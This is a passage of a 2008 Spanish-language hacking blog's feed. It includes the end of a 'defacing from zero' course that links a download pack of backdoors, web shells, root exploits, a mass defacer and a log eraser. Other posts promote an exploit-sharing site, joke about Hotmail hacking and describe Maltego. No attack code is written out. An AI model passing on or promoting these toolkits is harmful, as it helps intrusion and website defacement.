(Compilador)&lt;/a&gt;&lt;br /&gt;&lt;a href="http://es.wikipedia.org/wiki/Cygwin" target="_blank"&gt;Informacion Aqui&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;8-&lt;a href="http://www.metasploit.com/framework/download/" target="_blank"&gt;Metasploit Framework de Hacking Completa&lt;/a&gt;&lt;br /&gt;No muy nesesaria esta tool pero trae muy buenas herramientas mas info &lt;a href="http://es.wikipedia.org/wiki/Metasploit" target="_blank"&gt;Aqui&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;no voy a seguir enumerando herramientas por que no terminaria y lo que queremos aqui es que vayan desde 0 hasta no se 1,000 xD&lt;br /&gt;&lt;br /&gt;hay muchas tools que pueden ocupar como scripts en diferentes lenguajes,perl,C++,PhP,Ruby&lt;br /&gt;&lt;br /&gt;por ejemplo:&lt;br /&gt;&lt;a href="http://darkc0de.com/scanners/lfifuzz.py" target="_blank"&gt;LFI fUZZER (para buscar Lfi)&lt;/a&gt;&lt;br /&gt;En fin si enumero no terminamos les ahorre el trabajo preparandole un Big Pack (Paquete Grande) El Cual Contiene todo lo que nesesitas,Herramientas,Manuales,Shells,Perl Scripts,Python Scripts,Backdoors,Sources...&lt;br /&gt;&lt;br /&gt;De todo un gran pack por el cual querras darle una buena revisada...&lt;br /&gt;reitero que algunas de las herramientas que estan en el paquete no fueron testeadas asi que no me hago responsable de horrores ni danos en su pc.&lt;br /&gt;&lt;br /&gt;si enumero todo el contenido del paquete realmente este post se hace larguisimo si asi lo quieren preparo un texto y se los publico por aqui solo me dejan saber&lt;br /&gt;/backdoors&lt;br /&gt;/ManulesDefacing&lt;br /&gt;//Mass Defacer And Log Eraser&lt;br /&gt;/perltools&lt;br /&gt;/phyton to0ls&lt;br /&gt;/Reverse to0ls&lt;br /&gt;/Ro0t 3xpl0its&lt;br /&gt;/Scanners&lt;br /&gt;/shells&lt;br /&gt;/sources&lt;br /&gt;/to0ls&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/167649796/Defacing_Manuales_T0ols_Scripts_by_blood_rec.rar" target="_blank"&gt;Descargalo Aqui&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;###########################&lt;br /&gt;Ya con esto tienen realmente por donde empezar y realmente no nesesitan usar todas las tools todo es por paso comienzen por la programacion luego pasan por partes a aprender las teknikas..&lt;br /&gt;&lt;br /&gt;recuerden que no puedes aprender las tecnicas primero sin aprender programacion por que realmente no aprenderas comno funcionan las cosas..&lt;br /&gt;&lt;br /&gt;la programacion fue lo que comenzo todo y asi mismo lo terminara escoje el camino que quieras recorrer y descubre el mundo de la busqueda de vulnerabilidades..&lt;br /&gt;&lt;br /&gt;yo por mi parte no soy defacer no me gusta andar poniendo 1,000 index y decir soy el mas Pingon de la red...megusta buscar vulnerabilidades y notificarlas al administrador pero ya esta de ustedes escoger lo que quieren hacer con sus conocimientos&lt;br /&gt;&lt;br /&gt;Esta recopilacion fue hecha con motivos educacionales ni este servidor ni el sitio donde a sido posteado se hace responsable de el uso que le den,asi como tambien los autores de los manuales que han sido recopilados...&lt;br /&gt;&lt;br /&gt;espero que les sea de su agrado&lt;br /&gt;&lt;br /&gt;EOC (END OF COURSE) xD&lt;br /&gt;&lt;br /&gt;blood_rec&lt;/li&gt;&lt;/ul&gt;&lt;ul style="margin-top: 0pt; margin-bottom: 0pt;"&gt;&lt;li type="square"&gt;&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-852850933769655088?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/smnqYYY02nM" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2008-12-10T17:05:46.875-08:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">7</thr:total><enclosure url="http://www.milw0rm.com/papers/189" length="11287" type="application/pdf" /><feedburner:origLink>http://h4xxor.blogspot.com/2008/11/defacing-de-la-manera-correcta-desde-0.html</feedburner:origLink></item><item><title>Spanish Hacker Team The Come Back!!! (Regresa)</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/Vk7i4n1WFIs/spanish-hacker-team-come-back-regresa.html</link><category>Advisories</category><category>Hacking</category><category>Afiliaciones</category><category>Proyectos</category><category>Links</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Sat, 22 Nov 2008 12:28:19 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-3543800794987191124</guid><description>Estamos felices de anunciar que &lt;a href="http://hack0wn.com/"&gt;Spanish Hacker Team&lt;/a&gt; a Regresado esta vez con nuevo dominio y nuevo formato..&lt;br /&gt;&lt;br /&gt;http://hack0wn.com/&lt;br /&gt;&lt;br /&gt;el sitio como lo era &lt;a href="http://www.spanish-hackers.com/"&gt;SHT&lt;/a&gt; Esta Orientado a la publicaciones de Advisories,Fuckers,Papers Shellcodes y todo lo demas que podiamos encontrar en el viejo dominio con su antiguo Formato &lt;a href="http://h4xxor.blogspot.com/2008/09/shtspanish-hackers-team-proyecto.html"&gt;Info..&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Esta vez mi hermanito menor JosS A puesto un foro en el dominio para la publicacion de los respectivos servicios que brinda el foro:&lt;br /&gt;&lt;b&gt;&lt;a href="http://hack0wn.com/forum/index.php?board=6.0" name="b6"&gt;Advisories&lt;/a&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://hack0wn.com/forum/index.php?board=2.0" name="b2"&gt;Remote Expoits&lt;/a&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://hack0wn.com/forum/index.php?board=3.0" name="b3"&gt;Local Exploits&lt;/a&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://hack0wn.com/forum/index.php?board=5.0" name="b5"&gt;Web Apps Exploits&lt;/a&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://hack0wn.com/forum/index.php?board=4.0" name="b4"&gt;Proof Of Concept&lt;/a&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://hack0wn.com/forum/index.php?board=15.0" name="b15"&gt;Post Your Research&lt;/a&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://hack0wn.com/forum/index.php?board=7.0" name="b7"&gt;Papers&lt;/a&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://hack0wn.com/forum/index.php?board=8.0" name="b8"&gt;Sources&lt;/a&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://hack0wn.com/forum/index.php?board=11.0" name="b11"&gt;Shellcodes&lt;/a&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://hack0wn.com/forum/index.php?board=9.0" name="b9"&gt;Infector&lt;/a&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://hack0wn.com/forum/index.php?board=10.0" name="b10"&gt;Defences&lt;/a&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://hack0wn.com/forum/index.php?board=16.0" name="b16"&gt;Post Your Writing&lt;/a&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://hack0wn.com/forum/index.php?board=12.0" name="b12"&gt;Misc&lt;/a&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://hack0wn.com/forum/index.php?board=13.0" name="b13"&gt;Fuckers&lt;/a&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://hack0wn.com/forum/index.php?board=17.0" name="b17"&gt;Post Your Miscellaneous&lt;/a&gt;&lt;br /&gt;--------------------------------------------------------------&lt;br /&gt;Asi como los servicio de la web:&lt;br /&gt;&lt;/b&gt;  &lt;div id="menu"&gt;  &lt;ul id="main"&gt;&lt;li&gt;&lt;a href="http://hack0wn.com/advisories.php"&gt;Advisories&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://hack0wn.com/exploits.php"&gt;Exploits&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://hack0wn.com/papers.php"&gt;Papers&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://hack0wn.com/sources.php"&gt;Sources&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://hack0wn.com/shellcodes.php"&gt;Shellcodes&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://hack0wn.com/infector.php"&gt;Infector&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://hack0wn.com/defences.php"&gt;Defences&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://hack0wn.com/misc.php"&gt;Misc&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://hack0wn.com/fuckers.php"&gt;Fuckers&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://hack0wn.com/links.php"&gt;Links&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;###################################&lt;br /&gt;se los pongo asi por que son en dos formatos diferentes las publicaciones en el &lt;a href="http://hack0wn.com/forum/index.php"&gt;Foro&lt;/a&gt; son las primeras que le liste y la &lt;a href="http://hack0wn.com/"&gt;Web&lt;/a&gt; Que fueron las segunda que le liste..&lt;br /&gt;&lt;br /&gt;Este Proyecto Recalco como dije la primera vez hay que apoyarlo ya que es de nuestras comunidades latinas y un arduo trabajo que a puesto JosS A dispocicion de nosotros como proyecto de investigacion y del todo educacional xD...&lt;br /&gt;&lt;br /&gt;Felicitaciones a nuestro colega y Brindemos Para Que siga adelante...&lt;br /&gt;&lt;br /&gt;Greetz!!!!&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-3543800794987191124?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/Vk7i4n1WFIs" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2008-11-22T12:28:19.798-08:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2008/11/spanish-hacker-team-come-back-regresa.html</feedburner:origLink></item><item><title>Hackeando Hotmail y MSN De Manera Facil xD (Humor)</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/3vAAt5c-1sc/hackeando-hotmail-y-msn-de-manera-facil.html</link><category>hotmail</category><category>humor</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Fri, 21 Nov 2008 20:15:08 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-7546518244710709020</guid><description>Bueno Cansado Ya De Los Chicos En Los Foros Preguntando :&lt;br /&gt;Como Hackeo Hotmail?&lt;br /&gt;Quiero Ver Con Quien Habla Mi Zorra..&lt;br /&gt;Mi Mama Le Pega Los Cuernos A mi Papa Con Un Sargento Militar&lt;br /&gt;&lt;br /&gt;Me tome la molestia en hacer un manual de como hackear hotmail y msn sin nesesidad de xploits,troyanos o &lt;a href="http://es.wikipedia.org/wiki/Lamer_%28inform%C3%A1tica%29"&gt;cascanolaherramientas&lt;/a&gt;...&lt;br /&gt;&lt;br /&gt;si asi como lo lees!!! How To Hack Hotmail And MSN Messenger Without xploits,trojans and &lt;a href="http://es.wikipedia.org/wiki/Lamer_%28inform%C3%A1tica%29"&gt;cascanolato0ls&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;ok primero quiero recalcar que este manual fue hecho con licencia Creative mojons digo quiero decir Commons&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://creativecommons.org/"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 88px; height: 31px;" src="http://i.creativecommons.org/l/by/3.0/88x31.png" alt="" border="0" /&gt;&lt;/a&gt;Asi Que Ya saben toda la mierda de Publicaciones y cosas ETC,ETC,ETC....&lt;br /&gt;Dejemosnos de mierdas y pongamonos manos a la obra...&lt;br /&gt;&lt;br /&gt;Lo mejor de todo es que este manual esta orientado a cualquier sistema operativo:&lt;br /&gt;&lt;a href="http://studiotwentyone.files.wordpress.com/2007/08/3.jpg"&gt;Linux&lt;/a&gt;&lt;br /&gt;&lt;a href="http://skattertech.com/media/2007/10/apple-os-x-leopard-screenshot.jpg"&gt;Mac ox&lt;/a&gt;&lt;br /&gt;&lt;a href="http://techie-buzz.com/images/stories/MakeWindowsXPlooklikeWindowsVista_226C/Thank_you_for_using_Windows_by_salinah20.jpg"&gt;Windows xp&lt;/a&gt;&lt;br /&gt;Windows xD &lt;a href="http://www.qcf.com/images/network2.jpg"&gt;Virus Edition&lt;/a&gt;&lt;br /&gt;Windows xD &lt;a href="http://cyberparticle.files.wordpress.com/2008/02/blue_screen_of_death.gif"&gt;Blues Sceen Of Death Edition&lt;/a&gt;&lt;br /&gt;Windows xD &lt;a href="http://www.columbia.edu/acis/rhno/security/netstat.gif"&gt;Trojan Always Edition&lt;/a&gt;&lt;br /&gt;Windows xD &lt;a href="http://www.google.com/search?hl=en&amp;amp;safe=off&amp;amp;client=firefox-a&amp;amp;rls=com.ubuntu%3Aen-US%3Aunofficial&amp;amp;hs=jlO&amp;amp;q=windows+3.1+download&amp;amp;btnG=Search&amp;amp;lr=&amp;amp;aq=f&amp;amp;oq="&gt;Cascanola Edition&lt;/a&gt;&lt;br /&gt;&lt;a href="http://upload.wikimedia.org/wikipedia/commons/6/6e/OpenBSD39snapshotxfce.png"&gt;Open BSD&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.pcbsd.org/%7Ematto/wowpcbsd1.png"&gt;BSD&lt;/a&gt;&lt;br /&gt;&lt;a href="http://ebron.com/wp/wp-content/uploads/2007/07/53129-windows_vista_aero_wow.jpg"&gt;Windows Vista&lt;/a&gt;&lt;br /&gt;en fin en cualquier sistema operativo empecemos ya!!!! xD:&lt;br /&gt;Primero nuestras herramientas las listo con su respectivo link de descarga:&lt;br /&gt;1-scanner de victimas para encontrar tus victimas:&lt;br /&gt;&lt;a href="http://maps.google.com/"&gt;Scanner&lt;/a&gt;&lt;br /&gt;2-Nesesitamos buenos wordlist para nuestra herramienta de fuerza bruta&lt;br /&gt;&lt;a href="http://www.blackmambatactical.com/magazines.gif"&gt;Aqui&lt;/a&gt;&lt;br /&gt;3-Bueno Esta Herramienta Que Es La que vamos a usar (Fuerza Bruta)&lt;br /&gt;&lt;a href="http://www.defensereview.com/stories/m16clinic/M16%20Viper%20with%20the%20Coyote%20Ugly%20Finish,%20by%20M16%20Clinic.jpg"&gt;Supermega h4xor juanker Hotmail tool&lt;/a&gt;&lt;br /&gt;4-Si nesesitamos ayuda con una herramienta extra ocupamos esta:&lt;br /&gt;&lt;a href="http://www.clcweb.net/db_BalkinsAnneMarie29.jpg"&gt;Supermega h4x0r juanker Hotmail hot tool&lt;/a&gt;&lt;br /&gt;5-una buena herramienta para borrar logs:&lt;br /&gt;&lt;a href="http://img.alibaba.com/photo/50403399/Three_Point_Hydraulic_Backhoe_for_Tractors.jpg"&gt;Logs Eraser&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;y eso es todo xDDDD Ya me mentan la madre pero no son dificiles de utilizar xD&lt;br /&gt;#########################################&lt;br /&gt;&lt;br /&gt;Para entender el manual deben ver las imagenes que enlazan o sea clickeando las imagenes :D&lt;br /&gt;&lt;br /&gt;Primero ejecutamos nuestro &lt;a href="http://maps.google.com/"&gt;Scanner De Victimas&lt;/a&gt; (yendo a la casa de la victima) y Agregamos nuestro &lt;a href="http://www.blackmambatactical.com/magazines.gif"&gt;Wordlist&lt;/a&gt; A La Herramienta de &lt;a href="http://www.defensereview.com/stories/m16clinic/M16%20Viper%20with%20the%20Coyote%20Ugly%20Finish,%20by%20M16%20Clinic.jpg"&gt;Fuerza Bruta&lt;/a&gt; ahora vamos y&lt;br /&gt;ejecutamos nuetra herramienta de &lt;a href="http://www.defensereview.com/stories/m16clinic/M16%20Viper%20with%20the%20Coyote%20Ugly%20Finish,%20by%20M16%20Clinic.jpg"&gt;fuerza bruta&lt;/a&gt;  (se la mostramos a la victima)&lt;br /&gt;y comenzamos a &lt;a href="http://www.esquizopedia.com/wp-content/uploads/2008/05/punch.jpg"&gt;crackear  &lt;/a&gt;&lt;br /&gt;luego de empezar a crackear si ven que la contrasena es muy dificl ocupen la otra herramienta de &lt;a href="http://www.clcweb.net/db_BalkinsAnneMarie29.jpg"&gt;fuerza bruta&lt;/a&gt; y si aun asi el password de la victima no lo consiguen ejecuten la primera tool de esta manera &lt;a href="http://www.spacewar.com/images/iraqi-soldiers-target-shooting-practise-2006-afp-bg.jpg"&gt;Aqui&lt;/a&gt; ...&lt;br /&gt;luego de conseguir el pass borren sus &lt;a href="http://img.alibaba.com/photo/50403399/Three_Point_Hydraulic_Backhoe_for_Tractors.jpg"&gt;logs&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;de esta manera conseguiran hackear cualquier cuenta de hotmail,msn,yahoo,gmail cualquier correo hasta consiguen passwords de administradores de redes y webs....&lt;br /&gt;&lt;br /&gt;xDDDDD moraleja de este texto...no me manden mas mails preguntandome como se juankea una cuenta de hotmail o de cualquier correo con todas esas excusas de que su padre es infiel,que su novia le robaron y todas esas mamadas&lt;br /&gt;&lt;br /&gt;por que si no quedarian &lt;a href="http://www.owned.com/pictures/funny/Mothers_Punishment_Owned.html"&gt;asi&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;espero a que no lo tomen a mal...por que no era lo que ustedes esperaban pero lamentablemente no JUANKEO Cuentas de hotmail...&lt;br /&gt;&lt;br /&gt;xD&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-7546518244710709020?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/3vAAt5c-1sc" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2008-11-21T20:15:08.343-08:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">6</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2008/11/hackeando-hotmail-y-msn-de-manera-facil.html</feedburner:origLink></item><item><title>Maltego - Herramienta forense y de IT (Recolector de Info)</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/b2wmMQCm1f8/maltego-herramienta-forense-y-de-it.html</link><category>pentest</category><category>scanners</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Fri, 21 Nov 2008 18:57:17 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-2883740914313595897</guid><description>Una Excelente Aplicacion Para Encontrar Archivos Y directorios Ocultos En servidores Por Lo General La Recomiendo...&lt;br /&gt;&lt;br /&gt;&lt;span style="" onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;Maltego es una fuente abierta de inteligencia y aplicación forense.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; Te permite la minería y la recolección de información, así como la representación de esta información en una manera significativa.&lt;/span&gt; &lt;p&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Junto con sus bibliotecas de gráficos, Maltego, le permite identificar las relaciones clave entre la información y determinar las relaciones desconocidas anteriormente entre ellos.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; Es una  herramienta Imprecindible en el Sector forense, la seguridad y la inteligencia de los campos!&lt;/span&gt; &lt;/p&gt;&lt;p&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Maltego ofrece al usuario la información sin precedentes.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; La información es de palanca.&lt;/span&gt; &lt;/p&gt;&lt;p&gt;&lt;!--adsense#New468--&gt;&lt;/p&gt;&lt;p&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/span&gt;&lt;strong&gt;Maltego ¿Qué hace?&lt;/strong&gt;&lt;/span&gt; &lt;/p&gt;&lt;p&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Maltego es un programa que puede ser usado para determinar las relaciones del mundo real y los vínculos entre:&lt;/span&gt; &lt;/p&gt;&lt;ul&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Gente&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Grupos de personas (redes sociales)&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Empresas&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Organizaciones&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Sitios web&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Infraestructura de Internet, tales como: Dominios, nombres DNS, Netblocks y direcciones IP&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Frases&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Afiliaciones&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Documentos y archivos&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;&lt;p&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Estas entidades están vinculadas utilizando Scripts De Codigo Abierto.&lt;/span&gt; &lt;/p&gt;&lt;ul&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Maltego es fácil y rápido de instalar - por que utiliza Java, por lo que se ejecuta en Windows, Mac y Linux.&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Maltego le proporciona una interfaz gráfica que permite ver esas relaciones instantánea y precisa - lo que permite ver las conexiones ocultas.&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;El uso de la interfaz gráfica de usuario (GUI) se puede ver fácilmente las relaciones - incluso si son tres o cuatro grados de separación de distancia.&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Maltego es único porque utiliza un potente y flexible marco que hace posible la personalización.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt; Como tal, Maltego se pueden adaptar a su propio, y únicos requisitos.&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;!--adsense#New468--&gt;&lt;/p&gt;&lt;p&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;strong&gt;Limitaciones&lt;/strong&gt;&lt;/span&gt; &lt;/p&gt;&lt;p&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;La Version Community Edition es limitada en las siguientes maneras:&lt;/span&gt; &lt;/p&gt;&lt;ul&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;15 segundos de NAG pantalla&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Guardar y exportar se ha inhabilitado&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;Niveles limitados de zoom&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Sólo puede ejecutarse  una sola Auditoria por entidad en un momento&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;No se puede copiar y pegar texto de la vista detallada&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Transformaciones limitadas a 75 por día&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;Aqui Encuentras Una Guia Sobre la To0l &lt;a href="http://ctas.paterva.com/view/Userguide"&gt;Click&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Puedes Descargar Maltego Version Comunidad Aqui:&lt;br /&gt;&lt;a href="http://www.paterva.com/malv2/MaltegoInstaller-v2-210-CE.jar"&gt;Maltego CE - Linux&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.paterva.com/malv2/MaltegoInstaller-v2-210-CE.exe"&gt;Maltego CE - Windows&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Lee Mas &lt;a href="http://www.paterva.com/maltego/"&gt;Aqui&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-2883740914313595897?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/b2wmMQCm1f8" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2008-11-21T18:57:17.053-08:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><enclosure url="http://www.paterva.com/malv2/MaltegoInstaller-v2-210-CE.jar" length="10782302" type="application/x-java-archive" /><feedburner:origLink>http://h4xxor.blogspot.com/2008/11/maltego-herramienta-forense-y-de-it.html</feedburner:origLink></item><item><title>Palabras Mas Bucadas En Google (Hacking)</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/1QlCjiPfBSk/palabras-mas-bucadas-en-google-hacking.html</link><category>Hacking</category><category>Dorks</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Thu, 20 Nov 2008 17:35:58 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-3945651243920007402</guid><description>Cuales son las palabras que mas buscan los chicos en google referentes al hacking?&lt;br /&gt;&lt;br /&gt;las busquedas mas hechas:&lt;br /&gt;&lt;br /&gt;como usar Metasploi&lt;br /&gt;Metasploit Tuto&lt;br /&gt;Manual de Metasploit&lt;br /&gt;Sql Injection Scanner&lt;br /&gt;Hackear Hotmail (Lamentablemente)&lt;br /&gt;Hackear Msn&lt;br /&gt;Subir Shell Vbulleting&lt;br /&gt;sql Injection Scanner&lt;br /&gt;cracker para desencriptar los hash de joomla&lt;br /&gt;subir archivos con metodo sql injection&lt;br /&gt;explotacion de un xss&lt;br 